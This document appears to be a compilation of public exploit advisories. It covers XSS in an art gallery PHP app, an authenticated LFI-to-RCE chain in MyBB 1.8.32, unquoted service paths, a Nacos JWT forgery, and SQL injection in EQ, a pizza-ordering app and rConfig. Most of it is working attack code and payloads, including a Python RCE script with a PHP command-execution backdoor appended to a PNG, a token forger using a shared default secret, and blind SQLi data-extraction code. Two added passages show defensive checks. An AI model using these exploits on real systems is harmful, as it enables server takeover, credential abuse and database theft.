<pre><code># Exploit Title: Art Gallery Management System Project v1.0 - Reflected Cross-Site Scripting (XSS)<br /># Date: 20/01/2023<br /># Exploit Author: Rahul Patwari<br /># Vendor Homepage: https://phpgurukul.com/<br /># Software Link: https://phpgurukul.com/projects/Art-Gallery-MS-PHP.zip<br /># Version: 1.0<br /># Tested on: XAMPP / Windows 10<br /># CVE : CVE-2023-23161<br /><br /># Proof of Concept:<br /># 1- Install the application Art Gallery Management System Project v1.0<br /><br /># 2- Go to https://localhost.com/Art-Gallery-MS-PHP/product.php?cid=3&&artname=prints<br /><br /># 3- Insert the XSS payload into the artname parameter.<br />The XSS payload: %3Cimg%20src=1%20onerror=alert(document.domain)%3E<br /><br /># 4- Go to https://localhost.com/Art-Gallery-MS-PHP/product.php?cid=1&&artname=%3Cimg%20src=1%20onerror=alert(document.domain)%3E<br /><br /># 5- The XSS triggers: the artname value is reflected into the page without output encoding, so the injected img tag's onerror handler runs alert(document.domain).<br /><br /></code></pre>
<pre><code># Exploit Title: MyBB 1.8.32 - Chained LFI Remote Code Execution (RCE) (Authenticated)<br /># Date: 2023-01-19<br /># Exploit Author: lUc1f3r11 (https://github.com/FDlucifer)<br /># Vendor Homepage: https://mybb.com/<br /># Software Link: https://github.com/mybb/mybb/releases/tag/mybb_1832<br /># Version: MyBB 1.8.32<br /># Tested on: Linux<br /># CVE : N/A<br /># Detailed Analysis : https://fdlucifer.github.io/2023/01/17/mybb1-8-32-LFI-RCE/<br /><br /># (1). In MyBB's Admin CP, Configuration -> Profile Options -> Avatar Upload Path can be changed to /inc, which bypasses the blacklist of upload directories.<br /># (2). With that done, an avatar upload from the "admin avatar upload" page (http://www.mybb1832.cn/admin/index.php?module=user-users&action=edit&uid=1#tab_avatar) can be chained with the LFI in the "Edit Language Variables" page (http://www.mybb1832.cn/admin/index.php?module=config-languages&action=edit&lang=english).<br /># (3). Together these bugs give authenticated RCE.<br /># (note). The user must have the rights to add or update settings and to update avatars. Tested on MyBB 1.8.32.<br />#<br />#<br /># Exp Usage:<br /># 1. First choose a PNG file smaller than 1 KB.<br /># 2. Then append a simple PHP backdoor to the PNG with the following commands (the file still identifies as a PNG afterwards):<br /># mac@xxx-2 php-backdoor % cat simple-backdoor.php <br /># <?php<br /># if(isset($_REQUEST['cmd'])){<br /># echo "<getshell success>";<br /># $cmd = ($_REQUEST['cmd']);<br /># system($cmd);<br /># echo "<getshell success>";<br /># phpinfo();<br /># }<br /># ?><br /># mac@xxx-2 php-backdoor % ls <br /># simple-backdoor.php test.png<br /># mac@xxx-2 php-backdoor % cat simple-backdoor.php >> test.png <br /># mac@xxx-2 php-backdoor % file test.png <br /># test.png: PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced<br /># 3. Finally run the exploit script with the following command to get the RCE output and 
enjoy the shell...<br /># python3 exp.py --host http://www.xxx.cn --username admin --password xxx --email xxx@qq.com --file avatar_1.png --cmd "cat /etc/passwd"<br /><br /><br />import requests<br />import argparse<br />import re<br />from urllib.parse import quote<br />from bs4 import BeautifulSoup<br />from requests_toolbelt import MultipartEncoder<br /><br /><br />r_clients = requests.Session()<br /><br /><br />def exploit(username, password, email, host, file, cmd):<br />    # Step 1: log in to the Admin CP and change the avatar upload path to ./inc to bypass the upload path blacklist<br /><br />    data = {<br />        "username" : username,<br />        "password" : password,<br />        "do" : "login"<br />    }<br /><br />    login_txt = r_clients.post(host + "/admin/index.php", data=data).text<br /><br />    if "The username and password combination you entered is invalid" in login_txt:<br />        print("[-] Login failure. Incorrect credentials supplied")<br />        exit(1)<br /><br />    print("[+] Login successful!")<br /><br />    if "Access Denied" in login_txt:<br />        print("[-] Supplied user doesn't have the rights to add a setting")<br />        exit(1)<br /><br />    print("[*] Adding ./inc upload path settings...")<br /><br />    soup = BeautifulSoup(login_txt, "lxml")<br />    my_post_key = soup.find_all("input", {"name" : "my_post_key"})[0]['value']<br />    print("[+] my_post_key: ", my_post_key)<br />    print("[+] cookies: ", r_clients.cookies.get_dict())<br />    cookies = r_clients.cookies.get_dict()<br /><br />    # Settings group gid 10 (Configuration -> Profile Options) as posted by the form; avataruploadpath is the value that matters<br />    data = {<br />        "my_post_key" : my_post_key,<br />        "gid" : 10,<br />        "upsetting[sigmycode]" : 1,<br />        "upsetting[sigcountmycode]" : 1,<br />        "upsetting[sigsmilies]" : 1,<br />        "upsetting[sightml]" : 0,<br />        "upsetting[sigimgcode]" : 1,<br />        "upsetting[maxsigimages]" : 2,<br />        "upsetting[siglength]" : 255,<br />        "upsetting[hidesignatures]" : "",<br />        "upsetting[hidewebsite]" : "",<br />        "upsetting[useravatar]" : "./inc",<br />        "upsetting[useravatardims]" : "100x100",<br />        "upsetting[useravatarrating]" : 0,<br />        "upsetting[maxavatardims]" : "100x100",<br />        
        "upsetting[avatarsize]" : 25,<br />        "upsetting[avatarresizing]" : "auto",<br />        "upsetting[avataruploadpath]" : "./inc",<br />        "upsetting[allowremoteavatars]" : 1,<br />        "upsetting[customtitlemaxlength]" : 40,<br />        "upsetting[allowaway]" : 1,<br />        "upsetting[allowbuddyonly]" : 0<br />    }<br /><br />    modify_settings_txt = r_clients.post(host + "/admin/index.php?module=config-settings&action=change", data=data, allow_redirects=False, cookies=cookies)<br /><br />    if modify_settings_txt.status_code != 302:<br />        soup = BeautifulSoup(modify_settings_txt.text, "lxml")<br />        error_txt = soup.find_all("div", {"class" : "error"})[0].text<br />        print("[-] modify upload path failed. Reason: '{}'".format(error_txt))<br />        exit(1)<br /><br />    print("[+] ./inc upload path settings added!")<br /><br />    # Step 2: upload the PNG with the appended PHP backdoor as the admin's avatar; it is stored under ./inc<br />    filename = "test.png"<br />    with open(filename, "rb") as f:<br />        image_binary = f.read()<br />    print("[+] read image successful! ")<br /><br />    print("[+] image contents: ", image_binary)<br /><br />    data1 = {<br />        'my_post_key': my_post_key,<br />        'username': username,<br />        'email': email,<br />        'avatar_upload': (filename, open(filename, 'rb'), 'image/png')<br />    }<br /><br />    m = MultipartEncoder(data1)<br /><br />    headers = {<br />        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/109.0",<br />        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",<br />        "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",<br />        "Accept-Encoding": "gzip, deflate",<br />        "Content-Type": m.content_type,<br />        "Origin": "null",<br />        "Connection": "close",<br />        "Upgrade-Insecure-Requests": "1"<br />    }<br /><br />    upload_url = host + "/admin/index.php?module=user-users&action=edit&uid=1"<br /><br />    upload = r_clients.post(upload_url, data=m, allow_redirects=False, headers=headers, cookies=cookies)<br /><br />    if 
upload.status_code != 302:<br />        soup = BeautifulSoup(upload.text, "lxml")<br />        error_txt = soup.find_all("div", {"class" : "error"})[0].text<br />        print("[-] upload avatar didn't work. Reason: '{}'".format(error_txt))<br />        exit(1)<br /><br />    print("[+] upload malicious avatar png success!")<br /><br />    # Step 3: run commands through the language-file LFI and read the output back.<br />    # With the upload path set to ./inc, editwith=".." points the language file include one<br />    # directory up from inc/languages, i.e. at the avatar that was just uploaded into ./inc<br />    data2 = {<br />        'my_post_key': my_post_key,<br />        'file': file,<br />        'lang': "english",<br />        'editwith': "..",<br />        'inadmin': 0<br />    }<br /><br />    exec_url = host + "/admin/index.php?module=config-languages&action=edit&cmd=" + quote(cmd)<br /><br />    commands_exec = r_clients.post(exec_url, data=data2, cookies=cookies)<br /><br />    if commands_exec.status_code != 200:<br />        soup = BeautifulSoup(commands_exec.text, "lxml")<br />        error_txt = soup.find_all("div", {"class" : "error"})[0].text<br />        print("[-] command exec didn't work. Reason: '{}'".format(error_txt))<br />        exit(1)<br /><br />    cmd_output = re.findall(r'<getshell success>(.*?)<getshell success>', commands_exec.text, re.S)<br /><br />    if not cmd_output:<br />        print("[-] backdoor marker not found in the response; check that --file names the uploaded avatar")<br />        exit(1)<br /><br />    print("[+] exec status: ", commands_exec.status_code)<br />    print("[+] command exec success:\n\n", cmd_output[0])<br /><br /><br />parser = argparse.ArgumentParser()<br />parser.add_argument('--username', required=True, help="MyBB Admin CP username")<br />parser.add_argument('--password', required=True, help="MyBB Admin CP password")<br />parser.add_argument('--email', required=True, help="MyBB Admin CP admin's email (easy to find in the admin users panel)")<br />parser.add_argument('--file', required=True, help="the image file name on the server that we uploaded before (easy to find in the admin users panel)")<br />parser.add_argument('--host', required=True, help="e.g. 
http://target.website.local, http://10.10.10.10, http://192.168.23.101:8000")<br />parser.add_argument('--cmd', required=False, help="Command to run")<br />args = parser.parse_args()<br /><br />username = args.username<br />password = args.password<br />email = args.email<br />file = args.file<br />host = args.host<br />cmd = "id" if args.cmd is None else args.cmd<br /><br />print("""_______________________________________\n<br />/ MyBB 1.8.32 - Chained LFI Remote Code \ \n<br />\ Execution (RCE) (Authenticated) / \n<br /> --------------------------------------- \n<br /> \ ^__^ \n<br /> \ (oo)\_______ \n<br /> (__)\ )\/\ \n<br /> ||----w | \n<br /> || || \n<br />Author: lUc1f3r11<br />Github: https://github.com/FDlucifer""")<br />exploit(username, password, email, host, file, cmd)<br /> <br /><br /></code></pre>
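The step that gets the backdoor onto the server is `cat simple-backdoor.php >> test.png`: the result is still a valid PNG as far as `file` and any header-only check are concerned. The following is an added example written for this page (it is neither the advisory's script nor MyBB code) showing the server-side check that defeats that trick: walk the PNG chunk structure, refuse anything after the IEND chunk, and separately flag a PHP open tag anywhere in the file, which also catches a payload hidden inside a chunk such as tEXt instead of after IEND. The sample images are built inline and are constructed, not real uploads; the backdoor string is a trimmed stand-in for the advisory's simple-backdoor.php.

```python
"""PNG chunk walker that flags the PNG+PHP polyglot used in the MyBB chain.

Added example for this page; not the advisory's code and not MyBB code.
"""
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
PHP_MARKERS = (b"<?php", b"<?=")


def parse_png(data):
    """Return (chunks, end_offset); chunks is a list of (type, body).

    Raises ValueError on anything malformed so the caller treats the
    upload as unsafe instead of guessing.
    """
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("bad PNG signature")
    pos, chunks = len(PNG_SIGNATURE), []
    while True:
        if pos + 8 > len(data):
            raise ValueError("truncated chunk header")
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        body_start, body_end = pos + 8, pos + 8 + length
        if body_end + 4 > len(data):
            raise ValueError("truncated chunk %s" % ctype.decode("latin-1"))
        body = data[body_start:body_end]
        (crc,) = struct.unpack(">I", data[body_end:body_end + 4])
        if zlib.crc32(ctype + body) & 0xFFFFFFFF != crc:
            raise ValueError("bad CRC on chunk %s" % ctype.decode("latin-1"))
        chunks.append((ctype, body))
        pos = body_end + 4
        if ctype == b"IEND":
            return chunks, pos


def check_avatar(data):
    """Return a list of findings for an uploaded image; an empty list means clean."""
    try:
        chunks, end = parse_png(data)
    except ValueError as exc:
        return ["malformed PNG: %s" % exc]
    findings = []
    if chunks[0][0] != b"IHDR":
        findings.append("first chunk is %s, not IHDR" % chunks[0][0].decode("latin-1"))
    if len(data) > end:
        # This is exactly what `cat backdoor.php >> image.png` produces.
        findings.append("%d bytes of trailing data after IEND" % (len(data) - end))
    for marker in PHP_MARKERS:
        if marker in data:
            findings.append("PHP open tag %s present" % marker.decode())
            break
    return findings


def build_png(width=1, height=1, extra_chunks=()):
    """Build a minimal valid 8-bit RGBA PNG (constructed test input)."""
    def chunk(ctype, body):
        return (struct.pack(">I", len(body)) + ctype + body
                + struct.pack(">I", zlib.crc32(ctype + body) & 0xFFFFFFFF))
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 6, 0, 0, 0)
    raw = b"".join(b"\x00" + b"\x00\x00\x00\xff" * width for _ in range(height))
    out = PNG_SIGNATURE + chunk(b"IHDR", ihdr)
    for ctype, body in extra_chunks:
        out += chunk(ctype, body)
    return out + chunk(b"IDAT", zlib.compress(raw)) + chunk(b"IEND", b"")


# Constructed stand-in for the advisory's simple-backdoor.php (trimmed).
BACKDOOR = b"<?php if(isset($_REQUEST['cmd'])){ system($_REQUEST['cmd']); } ?>"
CLEAN = build_png()
APPENDED = CLEAN + BACKDOOR                                      # cat simple-backdoor.php >> test.png
IN_CHUNK = build_png(extra_chunks=[(b"tEXt", b"Comment\x00" + BACKDOOR)])

if __name__ == "__main__":
    for name, blob in (("clean", CLEAN), ("appended", APPENDED), ("in-chunk", IN_CHUNK)):
        print("%-9s %s" % (name, check_avatar(blob) or "ok"))
```

The trailing-data check alone is enough for the exact technique in the advisory; the open-tag scan covers the in-chunk variant, which `file` also reports as a clean PNG. Re-encoding every accepted avatar through an image library before storing it removes both kinds of payload, and keeping the upload directory outside anything PHP will include is what breaks the chain regardless of the image contents.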
<pre><code># Exploit Title: Microsoft Exchange Active Directory Topology 15.02.1118.007 - 'Service MSExchangeADTopology' Unquoted Service Path<br /># Exploit Author: Milad Karimi (Ex3ptionaL)<br /># Exploit Date: 2023-01-18<br /># Vendor : Microsoft<br /># Version : 15.02.1118.007<br /># Tested on OS: Microsoft Exchange Server 2019 CU12<br /><br />#PoC :<br />==============<br /><br />C:\>sc qc MSExchangeADTopology<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: MSExchangeADTopology<br /> TYPE : 10 WIN32_OWN_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : C:\Program Files\Microsoft\Exchange Server\V15\Bin\Microsoft.Exchange.Directory.TopologyService.exe<br /> LOAD_ORDER_GROUP : <br /> TAG : 0<br /> DISPLAY_NAME : Microsoft Exchange Active Directory Topology<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br /></code></pre>
<pre><code># Exploit Title: HotKey Clipboard 2.1.0.6 - Privilege Escalation Unquoted Service Path<br /># Date: 2023/01/17<br /># Exploit Author : Wim Jaap van Vliet<br /># Vendor Homepage: www.clevo.com.tw<br /># Software Link: https://enstrong.blob.core.windows.net/en-driver/PDXXPNX1/Others/CC30_1006.zip<br /># Version: 2.1.0.6<br /># Tested on: Windows 11 Pro 10.0.22000<br /><br /># Exploit<br />The Hotkey Clipboard Service 'HKClipSvc', installed as part of Control Center 3.0 v3.97 (and earlier versions) by Clevo, has an unquoted service path.<br />This software package is usually installed on Clevo laptops (or other brands using Clevo barebones) as a driver.<br />This could potentially allow an authorized but non-privileged local user to execute arbitrary code with SYSTEM privileges.<br /><br /># Information<br /> <br />C:\>sc qc "HKClipSvc"<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: HKClipSvc<br /> TYPE : 10 WIN32_OWN_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : C:\Program Files (x86)\ControlCenter\Driver\x64\HKClipSvc.exe<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : HotKey Clipboard Service<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br /><br /></code></pre>
<pre><code># Exploit Title: Nacos 2.0.3 - Access Control vulnerability<br /># Date: 2023-01-17<br /># Exploit Author: Jenson Zhao<br /># Vendor Homepage: https://nacos.io/<br /># Software Link: https://github.com/alibaba/nacos/releases/<br /># Version: Up to and including 2.0.3<br /># Tested on: Windows 10<br /># CVE : CVE-2021-43116<br /># Required before execution: pip install PyJWT requests<br />import argparse<br />import base64<br />import requests<br />import time<br />import json<br />from jwt.algorithms import has_crypto, requires_cryptography<br />from jwt.utils import base64url_encode, force_bytes<br />from jwt import PyJWS<br /><br /><br />class MyPyJWS(PyJWS):<br />    # Re-implements PyJWS.encode so an already-serialised JSON payload can be signed<br />    # directly with the chosen algorithm; relies on PyJWS internals (_algorithms, _valid_algs)<br />    def encode(self,<br />               payload,  # type: Union[Dict, bytes]<br />               key,  # type: str<br />               algorithm='HS256',  # type: str<br />               headers=None,  # type: Optional[Dict]<br />               json_encoder=None  # type: Optional[Callable]<br />               ):<br />        segments = []<br /><br />        if algorithm is None:<br />            algorithm = 'none'<br /><br />        if algorithm not in self._valid_algs:<br />            pass<br /><br />        # Header<br />        header = {'alg': algorithm}<br /><br />        if headers:<br />            self._validate_headers(headers)<br />            header.update(headers)<br /><br />        json_header = force_bytes(<br />            json.dumps(<br />                header,<br />                separators=(',', ':'),<br />                cls=json_encoder<br />            )<br />        )<br /><br />        segments.append(base64url_encode(json_header))<br />        segments.append(base64url_encode(payload))<br /><br />        # Segments<br />        signing_input = b'.'.join(segments)<br />        try:<br />            alg_obj = self._algorithms[algorithm]<br />            key = alg_obj.prepare_key(key)<br />            signature = alg_obj.sign(signing_input, key)<br /><br />        except KeyError:<br />            if not has_crypto and algorithm in requires_cryptography:<br />                raise NotImplementedError(<br />                    "Algorithm '%s' could not be found. Do you have cryptography "<br />                    "installed?" 
% algorithm<br />                )<br />            else:<br />                raise NotImplementedError('Algorithm not supported')<br /><br />        segments.append(base64url_encode(signature))<br /><br />        return b'.'.join(segments)<br /><br /><br />def JwtGenerate():<br />    # Token secret used to forge the accessToken; the check only succeeds if the target still signs with it.<br />    # The secret is base64-decoded before use, as the server does.<br />    Secret = 'SecretKey01234567890123456789012345678901234567890123456789012345678'<br />    payload = json.dumps(<br />        {<br />            "sub": "nacos",<br />            "exp": int(time.time()) + 3600<br />        },<br />        separators=(',', ':')<br />    ).encode('utf-8')<br />    encoded_jwt = MyPyJWS().encode(payload, base64.urlsafe_b64decode(Secret), algorithm='HS256')<br />    return encoded_jwt.decode()<br /><br />def check(url, https, token):<br />    scheme = 'https://' if https else 'http://'<br />    r = requests.get(<br />        url=scheme + url + '/nacos/v1/cs/configs?dataId=&group=&appName=&config_tags=&pageNo=1&pageSize=10&tenant=&search=accurate&accessToken=' + token + '&username=',<br />        verify=False)<br />    # A 403 means the forged token was rejected; anything else means the config listing was served<br />    if r.status_code == 403:<br />        print("There is no CVE-2021-43116 problem with the url!")<br />    else:<br />        print("There is CVE-2021-43116 problem with the url!")<br /><br /><br />if __name__ == '__main__':<br />    parser = argparse.ArgumentParser()<br />    parser.add_argument("-t", "--target", help="URL of the target. example: 192.168.1.1:8848")<br />    parser.add_argument("-s", "--https", action="store_true", help="Use https. Default is false")<br />    args = parser.parse_args()<br />    url = args.target<br />    if url:<br />        check(url, args.https, JwtGenerate())<br />    else:<br />        print('Please enter URL!')<br /> <br /><br /></code></pre>
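The script above forges an accessToken by signing its own claims with a secret it already knows. The following is an added example written for this page (it is neither the advisory's script nor Nacos code) that does the same with only the standard library, instead of subclassing PyJWS and reaching into its private attributes, and then shows the server's side of the exchange: the forged token verifies under the shared secret and is rejected as soon as the secret is rotated. The secret string is the one the advisory's script uses, base64-decoded the same way; the rotated key is a constructed stand-in for an operator-chosen secret.

```python
"""Minting and checking an HS256 accessToken with the standard library.

Added example for this page; not the advisory's code and not Nacos code.
"""
import base64
import hashlib
import hmac
import json
import time

# Secret string from the advisory's script, decoded the way the script does it.
ADVISORY_SECRET_B64 = "SecretKey01234567890123456789012345678901234567890123456789012345678"
DEFAULT_KEY = base64.urlsafe_b64decode(ADVISORY_SECRET_B64)
# Constructed stand-in for a secret the operator chose instead of the shipped one.
ROTATED_KEY = hashlib.sha256(b"operator-chosen secret (constructed)").digest()


def b64url_encode(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def b64url_decode(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def forge_token(key, subject, ttl=3600, now=None):
    """Build header.claims.signature with the same claims the advisory's script uses."""
    now = int(time.time()) if now is None else now
    header = b64url_encode(json.dumps({"alg": "HS256"}, separators=(",", ":")).encode())
    claims = b64url_encode(json.dumps({"sub": subject, "exp": now + ttl}, separators=(",", ":")).encode())
    signing_input = ("%s.%s" % (header, claims)).encode("ascii")
    signature = hmac.new(key, signing_input, hashlib.sha256).digest()
    return "%s.%s.%s" % (header, claims, b64url_encode(signature))


def verify_token(key, token, now=None):
    """Return the claims if signature and expiry check out, else None.

    Both ends compute the same HMAC, so the only thing keeping an attacker
    out is the secrecy of `key`; a secret every installation shares is no
    secret at all.
    """
    try:
        header_b64, claims_b64, sig_b64 = token.split(".")
        header = json.loads(b64url_decode(header_b64))
        claims = json.loads(b64url_decode(claims_b64))
        signature = b64url_decode(sig_b64)
    except (ValueError, UnicodeDecodeError):
        return None
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        return None  # the token never gets to choose the algorithm ("none" included)
    expected = hmac.new(key, ("%s.%s" % (header_b64, claims_b64)).encode("ascii"), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, signature):
        return None
    now = int(time.time()) if now is None else now
    if not isinstance(claims, dict) or not isinstance(claims.get("exp"), int) or claims["exp"] <= now:
        return None
    return claims


if __name__ == "__main__":
    token = forge_token(DEFAULT_KEY, "nacos")
    print("forged accessToken:", token)
    print("accepted with shared key:", verify_token(DEFAULT_KEY, token) is not None)
    print("accepted after rotation:", verify_token(ROTATED_KEY, token) is not None)
```

The fix on the server side is the second half of this example: configure a per-deployment secret of sufficient length, at which point tokens minted against the shipped value fail signature verification and the check script above receives its 403.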
<pre><code># Exploit Title: Chromacam 4.0.3.0 - PsyFrameGrabberService Unquoted Service Path <br /># Exploit Author: Laguin Benjamin (MONK-MODE)<br /># Discovery Date: 2023-19-01<br /># Vendor Homepage: https://personifyinc.com/<br /># Software Link: https://personifyinc.com/download/chromacam<br /># Tested Version: Chromacam-4.0.3.0<br /># Vulnerability Type: Unquoted Service Path<br /># Tested on OS: Microsoft Windows 10 x64<br /># CVE: In progress<br /><br /># Step to discover the Unquoted Service Path:<br /><br />C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """<br /><br />Personify Frame Transformer PsyFrameGrabberService C:\Program Files (x86)\Personify\ChromaCam\64\PsyFrameGrabberService.exe Auto<br /><br />C:\>sc qc "PsyFrameGrabberService"<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: PsyFrameGrabberService<br /> TYPE : 110 WIN32_OWN_PROCESS (interactive)<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : C:\Program Files (x86)\Personify\ChromaCam\64\PsyFrameGrabberService.exe<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : Personify Frame Transformer<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br />C:\>systeminfo<br /><br />Host Name: DESKTOP-1000<br />OS Name: Microsoft Windows 10 Professional<br />OS Version: 10.0.19044 N/A build 19044<br /><br /># Exploit<br />If an attacker has already compromised the system and the current user has write privileges on "C:\" or on one of the directories along the service path ("C:\Program Files (x86)\", "C:\Program Files (x86)\Personify", "C:\Program Files (x86)\Personify\ChromaCam" or "C:\Program Files (x86)\Personify\ChromaCam\64"), he could place his own "Program.exe" (in C:\) or "PsyFrameGrabberService.exe" (in the ChromaCam\64 folder) there, and when the service starts it would launch the malicious file rather than the original "PsyFrameGrabberService.exe".<br />The service starts automatically at boot and runs as LocalSystem.<br /><br /></code></pre>
<pre><code>Exploit Title: EQ Enterprise management system v2.2.0 - SQL Injection<br />Date: 2022.12.7<br />Exploit Author: TLF<br />Vendor Homepage: https://www.yiquantech.com/pc/about.html<br />Software Link (download links of the affected applications): http://121.8.146.131/,http://183.233.152.14:9000/,http://219.135.168.90:9527/,http://222.77.5.250:9000/,http://219.135.168.90:9530/<br />Version: EQ v1.5.31 to v2.2.0<br />Tested on: Windows 10<br />CVE : CVE-2022-45297 <br /><br /><br />POC (time-based blind SQL injection through the ServerDB parameter of the login request; the injected WAITFOR DELAY in this request is '0:0:0'):<br />POST /Account/Login HTTP/1.1<br />Host: 121.8.146.131<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0<br />Content-Length: 118<br />Accept: application/json, text/javascript, */*; q=0.01<br />Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />Cookie: ASP.NET_SessionId=tlipmh0zjgfdm5b4h1tgvolg<br />Origin: http://121.8.146.131<br />Referer: http://121.8.146.131/Account/Login<br />X-Requested-With: XMLHttpRequest<br />Accept-Encoding: gzip<br /><br />RememberPwd=false&ServerDB=EQ%27and%28select%2B1%29%3E0waitfor%2F%2A%2A%2Fdelay%270%3A0%3A0&UserNumber=%27&UserPwd=%27<br /><br /></code></pre>
<pre><code>## Title: Online-Pizza-Ordering-1.0-Multiple-SQLi<br />## Author: nu11secur1ty<br />## Date: 03.31.2023<br />## Vendor: https://github.com/oretnom23<br />## Software: https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html<br />## Reference: https://portswigger.net/web-security/sql-injection<br /><br />## Description:<br />The `email` parameter of the login request is vulnerable to SQL injection (boolean-based blind, error-based and time-based blind, as the sqlmap output below shows).<br />An attacker can easily steal all information from the database and, depending on how long it takes to decrypt that information, use it for very malicious purposes.<br /><br />STATUS: HIGH Vulnerability<br /><br />[+]Payload:<br />```mysql<br />---<br />Parameter: email (POST)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: email=ZfCPbAWN@burpcollaborator.net' and '3479'='3479'<br />AND 2244=2244 AND 'GqOB'='GqOB&password=b0E!i9g!K9<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: email=ZfCPbAWN@burpcollaborator.net' and '3479'='3479' OR<br />(SELECT 8595 FROM(SELECT COUNT(*),CONCAT(0x716a6a7071,(SELECT<br />(ELT(8595=8595,1))),0x71716a7071,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND<br />'FXYe'='FXYe&password=b0E!i9g!K9<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: email=ZfCPbAWN@burpcollaborator.net' and '3479'='3479'<br />AND (SELECT 3772 FROM (SELECT(SLEEP(7)))xChJ) AND<br />'pJWv'='pJWv&password=b0E!i9g!K9<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Online-Pizza-Ordering-1.0/SQLi)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/qil6by)<br /><br />## Time spent:<br />00:37:00<br /><br /><br /></code></pre>
<pre><code># Exploit Title: rconfig 3.9.7 - Sql Injection (Authenticated)<br /># Exploit Author: azhen<br /># Date: 10/12/2022<br /># Vendor Homepage: https://www.rconfig.com/<br /># Software Link: https://www.rconfig.com/<br /># Vendor: rConfig<br /># Version: <= v3.9.7<br /># Tested against Server Host: Linux<br /># CVE: CVE-2022-45030<br /><br />import requests<br />import sys<br />import urllib3<br />urllib3.disable_warnings()<br /><br />s = requests.Session()<br /><br /># sys.argv.append("192.168.10.150") #Enter the hostname<br /><br />if len(sys.argv) != 2:<br />    print("Usage: python3 rconfig_sqli_3.9.7.py <host>")<br />    sys.exit(1)<br /><br />host=sys.argv[1] #Enter the hostname<br /><br /><br />def get_data(host):<br />    print("[+] Get db data...")<br />    # UNION-based injection in the command parameter of ajaxCompareGetCmdDates.php: each request<br />    # returns 1000 + ord() of one character of the query result, read back from the response text<br />    vul_url = "https://"+host+":443/lib/ajaxHandlers/ajaxCompareGetCmdDates.php?deviceId=-1&command='+union+select+concat(1000%2bord(substr({},{},1)),'-1-1')%20--%20"<br /><br />    query_exp = "database()"<br />    result_data = ""<br /><br />    for i in range(1, 100):<br />        # the session cookie from login() is sent automatically<br />        res = s.get(vul_url.format(query_exp, i), verify=False)<br />        # print(res.text)<br /><br />        a = chr(int(res.text[6:10]) - 1000)<br /><br />        # ord('') is 0 once substr() runs past the end of the value<br />        if a == '\x00':<br />            break<br /><br />        result_data += a<br /><br />        print(result_data)<br /><br />    print("[+] Database name: {}".format(result_data))<br /><br />    '''<br />    output:<br />    [+] Logging in...<br />    [+] Get db data...<br />    r<br />    rc<br />    rco<br />    rcon<br />    rconf<br />    rconfi<br />    rconfig<br />    rconfigd<br />    rconfigdb<br />    [+] Database name: rconfigdb <br />    '''<br /><br /><br />def login(host):<br />    print("[+] Logging in...")<br />    url = 
"https://"+host+":443/lib/crud/userprocess.php"<br />    headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "https://demo.rconfig.com", "Connection": "close", "Referer": "https://demo.rconfig.com/login.php", "Upgrade-Insecure-Requests": "1"}<br /><br />    data = {"user": "admin", "pass": "admin", "sublogin": "1"} #Use a valid set of credentials; the default is admin/admin<br />    s.post(url, headers=headers, data=data, verify=False)<br />    get_data(host)<br /><br />login(host)<br /> <br /><br /></code></pre>
